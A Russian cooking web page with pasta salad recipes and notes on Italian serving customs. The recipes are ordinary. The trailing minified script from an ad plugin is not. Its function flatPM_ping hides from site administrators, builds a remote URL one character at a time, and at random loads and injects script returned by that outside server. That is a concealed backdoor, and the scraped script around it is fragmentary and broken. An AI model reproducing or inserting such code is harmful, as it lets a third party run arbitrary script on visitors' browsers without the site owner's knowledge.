Салат с пастой

Рецепты салатов с пастой

Это вкусное и сытное блюдо, и приготовить его можно разнообразно, и даже вполне диетично, если положить побольше овощей и заправить легким соусом

Долгое время такое простое блюдо, как салат с пастой, или, по-русски – с макаронными изделиями казался мне каким-то нелогичным, неправильным.

Вермишель и «звездочки» как заправка супов и бульонов – да, спагетти и макароны как горячее блюдо – очень люблю, а вот салат… А на самом деле это вкусное и сытное блюдо, и приготовить его можно разнообразно, и даже вполне диетично, если положить побольше овощей и заправить легким соусом.

Такие салаты несложны в приготовлении, когда в следующий раз будете готовить для семьи рожки/ракушки/спиральки или перышки, отложите немного и поэкспериментируйте, «принцип сборки» такой: макароны, овощная составляющая (свежие, тушеные или слегка обжаренные овощи), белок (мясо, рыба, яйца, морепродукты или сыр), свежая зелень и заправка. Рекомендую овощей не жалеть, салат с ними выходит сочный и полезный, а паста не должна доминировать – все же помним, что готовим салат с пастой, а не наоборот! Если хотите понизить калорийность – рыбу для салата приготовьте на пару, используйте куриные грудки или нежирное мясо. Копченая курица, грудинка, слабосоленая рыба или рыба горячего копчения добавят пикантности. И, конечно, разнообразить салаты можно соусами-заправками.

Любимый многими майонез стоит приготовить самостоятельно, домашний майонез вкуснее покупного, уж точно – полезнее, и ко всему этому легко готовится. Салатный соус, очень на майонез похожий, но без сырых желтков в составе, можно сделать вообще в считанные минуты (см. здесь).

Мне нравятся заправки на основе растительного (оливкового) масла и лимонного сока: смешайте оливковое масло и лимонный сок в пропорции 3:1 (три части масла на одну часть кислоты), добавьте соль и перец и слегка взбейте, заправка должна немного загустеть. Это база, в которую можно добавлять горчицу и мед, соевый соус, зеленый/розовый/красный перец и другие приправы и пряности. Соус с медом и горчицей есть здесь, это одна из моих любимых версий этого соуса.

Давайте творить!

Салат с тунцом

Спиральки вареные – 1 стакан;

Перец сладкий – ½ шт. или 1 маленький;

Тунец кусочками в масле или в собственном соку – 1 банка;

Яйцо вареное – 1 шт.;

Маслины – 10-12 шт.;

Лук красный – ½ луковицы;

Домашний майонез или салатный соус;

1. Спиральки нужно сварить в большом количестве подсоленного кипятка практически до готовности, но не разваривать, иначе в салате могут раскиснуть. Откинуть на дуршлаг, облить горячей водой и заправить капелькой растительного масла, чтоб не слипались, и остудить. Чем качественнее и вкуснее ваши «макаронные изделия», тем лучше они сохраняют форму и плотность и не становятся водянистыми в салате долгое время.

2. Овощи надо подготовить: помидоры разрежьте пополам и выньте семечки, нарежьте кубиками. Перец очистите от семян и перегородок и нарежьте соломкой, красный лук – перьями, маслины можно нарезать колечками. Яйцо нарежьте дольками или кружками.

3. Выложите в миску все компоненты, добавьте кусочки тунца из банки, заправьте соусом и перемешайте. Рецепт приготовления домашнего майонеза или салатной заправки на основе молока здесь.

4. Также подойдет сюда масляный соус-заправка: смешайте 3-4 ложки растительного масла, столовую ложку лимонного сока, чайную ложку соевого соуса, немного черного молотого перца. Если соевый соус вы не любите – его можно не добавлять, но тогда, наверное, нужно будет досолить салат по вкусу.

5. Заправили? Выкладывайте в салатницу, на дно уложите салатные листья, верх украсьте свежей зеленью. И приглашайте всех к столу! Получился сочный, вкусный и яркий салат.

Салат с брокколи, козьим сыром и зеленой заправкой

Рожки/ракушки отваренные – 1,5 стакана;

Перец сладкий – ½ шт.;

Сыр козий или фета – 100 гр.;

Горошек зеленый ½ стакана;

Брокколи – 150 гр.;

Лук зеленый – несколько перьев;

Растительное масло – ½ стакана,

Зелень петрушки и укропа – ½ пучка;

Чеснок – 1 зубок, соль.

1. Макароны нужно сварить в большом количестве подсоленного кипятка практически до готовности, но не разваривать, иначе в салате могут раскиснуть.

2. Брокколи сварить, не разваривая – можно приготовить в микроволновке (на это нужно 3-4 минуты, под крышкой), или опустить в кипящую воду и варить примерно 5 минут. Нарезать на небольшие кусочки-соцветия.

3. Помидоры и перец нарежьте кубиками, лук мелко нашинкуйте.

4. Для зеленой заправки в блендере измельчите зелень и чеснок, вместе с маслом и солью.

5. Заправьте салат, перемешайте и выложите в салатницу. Этот салат достаточно легкий из-за большого количества овощей, а чесночная заправка придает ему остроту и пикантность.

И еще несколько вариантов, для пробуждения творческой мысли .

· Салат со слабосоленым лососем

Готовые короткие макаронные изделия, 2 помидора, 2 яйца, один огурец, слабосоленая или подкопченная рыба (ок. 100 гр.), свежий укроп, соль и перец. Заправить майонезом.

· Салат с куриной грудкой

Куриная грудка, нарезанная кубиками, готовые короткие макаронные изделия, зеленый горошек, зеленое яблоко без кожуры, нарезанное кубиками, салатная заправка или майонез.

· Салат с фетой и помидорами

Паста, помидоры, нарезанные кубиками, кедровые орехи, брынза или фета, черные маслины, зеленая заправка.

· Салат с креветками и огурцом

Паста, некрупные креветки, свежий огурец (нарезать соломкой), много свежей зелени, предпочтительно – укроп. Заправить домашним майонезом, пополам со сливками.

· Салат с шампиньонами

Паста, шампиньоны (нарезать, и немного поджарить с луком), вареные яйца, ветчина нежирная, сладкий перец или помидоры. Заправить оливковым маслом, соком лимона, посолить и поперчить по вкусу.

Рецепты салатов с пастой

Все рецепты салатов с пастой были не раз использованы для приготовления блюд. Они относятся к рецептам салатов. Также обратите внимание на собранные у нас рецепты салатов с пастернаком.

Теплый салат с пастой, горошком и творожным сыром

Горошек предварительно разморозить, я же просто заливаю горячей водой и оставляю на 5 минут, прогреться. Орехи поджарить на сухой сковороде. Пасту отварить до состояния al-dente, воду слить, сохранять в тепле. В миске соединить шпинат, горошек, пасту, сыр. Заправить . Потребуется: Паста небольшого формата 100-150 гр., Зеленый горошек замороженный 150 гр., Шпинат свежий 75 гр., Сыр творожный рассыпчатый (соленый) 150 гр., Орехи кедровые 50 гр., Оливковое масло EV.

Теплый салат с пастой, баклажанами и творожным сыром

Баклажаны нарезать произвольно, обжарить до желаемого состояния ***Я обжариваю несколько минут на сухой сковороде, затем добавляю немного оливкового масла и воды и довожу до готовности под крышкой, при необходимости добавляя воду***. Пасту отварить до состояния al-de. Потребуется: Баклажаны – 2 небольших, Помидоры черри 7-10 шт., Паста небольшого формата – 2 горсти, Рассыпчатый соленый творог – 100-150 гр., Маслины б/к- горсть, Несколько веточек петрушки, Оливковое масло, Лимонный сок, Салатные листья для украшения

Салат с пастой, лисичками и копчеными колбасками

Лисички промыть, просушить и обжарить в сковороде на сильном огне, без добавления масла, 5-7 минут. Образовавшуюся воду слить, огонь уменьшить, добавить немного масла, тимьян и готовить еще минут 5, после чего выложить к лисичкам колбаски, слегка обжарить их. При нео. Потребуется: Салатный микс 100 гр., Паста небольшого формата – горсть, Лисички свежие 400 гр., Колбаски копченые 200 гр., Несколько веточек свежего тимьяна, Пармезан/пекорино, Оливковое масло, Лимонный сок,

Летний салат с пастой и баклажанами

Баклажаны нарезать небольшими кубиками и обжарить на масле до мягкости. Подсолить и добавить специи при необходимости ***хотя я в данном блюде – за простоту и ясность вкусов!***. Добавить часть петрушки ***под рукой окажется базилик – смело замените (он предпочтитель. Потребуется: Паста крупного формата (типа пенне) 200 гр., 1 средний баклажан, Горсть помидоров черри, Петрушка, Оливковое масло, Соль, специи по вкусу, Пекорино, Грецкие орехи тертые – 2-3 ст.л.

Салат из пасты с курицей, грушами и дорблю

Отварить пасту. Салатные листья порвать руками и уложить на дно глубокой тарелки. Сверху выложить пасту и крупно порезанную вареную куриную грудку. Покрошить туда же сыр и добавить тоненькие ломтики груши. Смешать горчицу и оливковое масло. Заправить салат. Можить ег. Потребуется: 100 г разноцветной пасты, 100 г отварной куриной грудки, 1 небольшая плотная груша, 100 г сыра дорблю, 100 г любого салатного микса, 2 ст.л. оливкого масла, 1 ч.л. дижонской горчицы

Овощной салат с пастой, фетой и базиликом

Пасту отварить до состояния al dente, воду слить, пасту охладить или сохранять теплой (для телого варианта салата). Черри, перец и маслины нарезать произвольно, фету – кубиками (или просто покрошить), базилик измельчить. Соединить пасту с салатными листьями, овощами. Потребуется: Паста небольшого формата, Помидоры черри, Сыр “Фета", Маслины без косточек, Сладкий перец, Салатные листья (у меня мангольд и еще какой-то:)), Оливковое масло и лимонный сок, Базилик свежий (в данном случае зеленый) – по вкусу

Салат из пасты с тунцом

Пасту отварить до состояния al dente, воду слить, немного охладить. Овощи нарезать произвольно, соединить с пастой и листьями салата; можно заправить небольшим количеством масла, перемешать. Салат выложить на тарелку, присыпать сыром и подавать! Можно приготовить и б. Потребуется: Тунец консервированный в собственном соку, Паста небольшого формата, Помидоры черри или другого вида, Сладкий перец, Салатные листья, Пикантный твердый сыр (например, пармезан), Оливковое масло

Теплый салат из пасты, брюссельской капусты и фрикаделек

Для фрикаделек смешать куриный фарш, специи, яйца, тертый пармезан (грамм 30-50). Для придания массе более плотной формы я вмешал немного (2-3 ст.л) кукурузной муки. Действовал по интуиции, а получилось хорошо 🙂 Но вы можете приготовить фрикадельки по Вашему рецепту. Потребуется: Брюссельская капуста, паста (в моем случае “бантики", пармезан. Для фрикаделек: куриный фарш (в моем случае около 300 гр), 1-2 яйца, базилик, соль, розовый и зеленый перец горошком, немного пармезана и кукурузной муки)

Салат из пасты и тунца с кедровыми орешками

Все ингредиенты перемешать. Присыпать салат орехами. Для меня салат и так сочный, однако к нему неплохо подойдет смесь оливкового масла (либо масло от тунца) с лимонным соком. Пасту отварить до состояния Al dente, немного остудить. Перец и оливки нарезать произвольно. Потребуется: Паста небольшого формата, тунец в собственном соку (можно в масле), оливки (можно фаршированные, например, лимонами), сладкий перец, кедровые орехи

Салат из пасты с фасолью и томатным соусом

Все овощи нарезать и смешать. Отварить пасту в подсоленной воде до готовности, слить воду. Осторожно смешайте горячую пасту с овощами. Холодные овощи охладят пасту и не дадут изделиям слипнуться, а тепло радиатори позволить лучше выявить вкус овощей. Взбейте все ко. Потребуется: 225 гр. пасты (у меня радиатори, они же спиральки ), 4 помидора, нарежьте дольками, 1 большой сладкий перец, нарежьте соломкой, 3 черешка сельдерея, тонко нарежьте, 1 банка консервированной белой фасоли, слейте жидкость и промойте, 1 ч.л. сушеного базилика.

Салат с пастой

Острый салат с рисовой лапшой для любителей китайской кухни несложно приготовить дома.

  • 190-200 г рисовой тонкой лапши
  • 1 жареное куриное бедро (не обязательно)
  • 1 морковь
  • 3 дольки чеснока
  • 60-70 мл рисового уксуса
  • 3 ст. ложки рыбного соуса
  • 1 ст. ложка пасты чили
  • 1 ч. ложка коричневого сахара
  • четверть ч. ложки соли
  • 4-5 перьев зеленого лука
  • 3-4 веточки кинзы или петрушки
  • по 4-6 листочков мяты и базилика
  • 1 перчик чили красный
  • почти полстакана арахиса
  • 1 ч. ложка кунжутного масла

Гавайский салат с макаронами

Гавайским салатом с макаронами вполне можно поужинать. А еще он идеально подходит к жареному мясу или рыбе.

  • 150 г отваренной пасты
  • 3 маленькие моркови
  • 100 мл майонеза
  • соль и перец – по необходимости

Салат с пастой фузилли

Салат с пастой фузилли – блюдо в стиле средиземноморской кухни, которое может служить сытным салатом, а при.

  • 500 г пасты фузилли (Fusilli)
  • 500 г помидоров черри
  • 110 г натертого сыра пармезан
  • 100 г консервированных анчоусов (филе)
  • 70 г маслин без косточек
  • 2 ст. ложки каперсов
  • несколько веточек свежего базилика
  • 0,5-1 ч. ложка хлопьев красного перца чили
  • 6 ст. ложек оливкового масла
  • перец и соль

Пикантный салат с пастой

Еще бы не пикантный – салат с пастой мы заправляем соусом с хреном. Вкусно – очень.

  • 150 г отварного мяса
  • 150 г некрупной пасты
  • 140 г моркови
  • 150 г маринованных огурцов
  • 2 яйца
  • 100-150 г хрена
  • 1-1,5 стакана сметаны
  • 1-2 ст. ложки 4% уксуса
  • соль и немного сахара

Пекинский салат с фунчезой

При том, сколько продуктов китайской кухни появилось в наших супермаркетах – грешно было бы не пользоваться этим. Так.

  • 150-170 г мякоти свинины
  • 300 г белокочанной капусты
  • 2 средних свежих огурца
  • 1-2 моркови
  • 50 г лапши фунчеза
  • 2 дольки чеснока
  • 3 ст. ложки белого винного уксуса
  • 2 ст. ложки соевого соуса
  • 5 ст. ложек растительного масла
  • соль и красный молотый перец – по вкусу

Салат с куриной грудкой по-итальянски

Салат с куриной грудкой по-итальянски – тут можно не гадать. Раз по-итальянски – значит, не обойдется без пасты. А.

Салаты с пастой

Для русского человека «салат с пастой» звучит непривычно, но выглядит вполне привлекательно.

Итальянцы – потрясающие люди, с удивительными обычаями и совершенно неповторимой кухней.

Салаты с пастой (2)

К еде итальянцы относятся очень серьезно: обед для них – нерушимая традиция. Настоящий итальянец не станет обедать на бегу, быстренько, чем-нибудь, чтобы утолить голод, обед – это семейный ритуал, когда все члены семьи собираются за столом и общаются между собой. Поэтому ровно в полдень вся Италия отправляется обедать, и обедают часа два-три.

Традиционно, первой на стол подается антипаста. Это такое блюдо, которое должно вызвать настоящий аппетит. На мой взгляд, блюда в итальянской кухне сами по себе выглядят очень привлекательно, но итальянцам, конечно, виднее.

Дальше идет суп или паста. Затем – второе блюдо из мяса или рыбы и лишь затем – салат.

На салатах следует остановиться подробнее, поскольку среди них есть такие, которые с успехом могли бы заменить собой вообще целый ужин. Я говорю о салатах с пастой.

Салаты с пастой – очень сытные и необыкновенно красивые. Их подают на стол теплыми или холодными, но горячими – никогда. И именно поэтому, если вы хотите часть макарон использовать в салат, не кладите в них сливочное масло, лучше ту часть макарон, которая приготовлена для салата – помажьте оливковым маслом и уберите в холодильник.

Макароны (или, как говорят сами итальянцы – паста) для салатов используются тоже не всякие. Прежде всего, это должна быть короткая паста. Подходят для салата ригатони, седани, пенне, бабочки фарфале, ракушки.

Соусы для салата с пастой не должны быть слишком густыми.

Вот тут тоже нужно пояснение. Когда мы говорим «соус», то для нас это, чаще всего, однородная масса, в общем-то, довольно жидкая. Сметана, майонез, кетчуп… Для итальянцев соус – это начинка к пасте и пицце.

Надо сказать, что рецептов приготовления салатов с пастой столько же, сколько хозяек, если даже не больше, и, хотя для русского человека «салат с пастой» звучит непривычно, но выглядит вполне привлекательно.

Пасту для салата можно использовать или оставшуюся от гарнира, или же сварить отдельно. Если вы варите пасту специально для салата – промойте ее холодной водой и дайте воде стечь. Некоторые рецепты приготовления салата с пастой предлагают перед тем, как добавлять пасту в салат – вновь ошпарить ее кипятком, но это уж зависит от конкретной ситуации. Чаще всего теплую пасту рекомендуют добавлять в салаты с салями.

Паста для салата не должна быть разваренной: итальянцы называют правильно сваренную пасту «аль денте», т.е. она должны быть чуточку недоваренной в самой своей середине. Потому, если пока вы не научились определять это состояние пасты, то просто варите ее на минуту-полминуты меньше, чем указано на пачке. Переваренная паста не так вкусна, не так красиво смотрится в салате и, что тоже важно, может повредить вашей фигуре, тогда как паста, сваренная до состояния «аль денте» – только улучшит пищеварение. Вот так, какая-то лишняя минута при варке может полностью изменить свойства пасты.

Все ингредиенты для салата с пастой смешивают, после чего добавляют заправку, которую лучше всего делать на основе оливкового масла. Не пробуйте добавлять майонез или сметану, вы испортите вкус салата. Следуйте рецептам итальянцев в приготовлении салата с пастой, и сытное блюдо украсит ваш стол.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};